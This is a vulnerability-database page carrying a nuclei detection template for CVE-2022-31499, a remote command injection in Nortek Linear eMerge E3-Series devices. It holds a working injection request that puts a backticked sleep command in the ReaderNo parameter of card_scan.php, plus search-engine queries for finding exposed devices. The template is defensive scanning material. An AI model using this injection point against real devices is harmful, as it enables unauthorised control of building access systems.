Lucene search
K

Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 90 Views

Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection. Allows attackers to execute arbitrary commands and gain system control. Requires urgent upgrade to >=0.32-08f

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Nortek Linear eMerge E3-Series Command Injection Vulnerability
8 Aug 202200:00
zdt
ATTACKERKB
CVE-2022-31499
25 Aug 202223:15
attackerkb
Circl
CVE-2022-31499
27 Jun 202312:16
circl
CNNVD
Nortek Control Linear eMerge E3-Series 操作系统命令注入漏洞
8 Aug 202200:00
cnnvd
CVE
CVE-2022-31499
25 Aug 202222:09
cve
Cvelist
CVE-2022-31499
25 Aug 202222:09
cvelist
NVD
CVE-2022-31499
25 Aug 202223:15
nvd
OSV
CVE-2022-31499
25 Aug 202223:15
osv
Packet Storm
Nortek Linear eMerge E3-Series Command Injection
8 Aug 202200:00
packetstorm
Prion
Design/Logic Flaw
25 Aug 202223:15
prion
Rows per page
id: CVE-2022-31499

info:
  name: Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://github.com/omarhashem123/CVE-2022-31499
    - http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31499
    - https://eg.linkedin.com/in/omar-1-hashem
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31499
    cwe-id: CWE-78
    epss-score: 0.64832
    epss-percentile: 0.99148
    cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nortekcontrol
    product: emerge_e3_firmware
    shodan-query:
      - title:"eMerge"
      - http.title:"emerge"
      - http.title:"linear emerge"
    fofa-query:
      - title="emerge"
      - title="linear emerge"
    google-query:
      - intitle:"linear emerge"
      - intitle:"emerge"
  tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - contains(header, "text/html")
          - status_code == 200
          - contains(body, '{\"CardNo\":false')
        condition: and
# digest: 4b0a00483046022100aaf1c4550f33cfda2f1f966a904a8e1d466280912f724b2a3aeabcbbfe08ef2d02210096c32055ca21602dc0cb5544cc3554f5fa5735f8e17ff85e70b8d112439d246c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.64832
90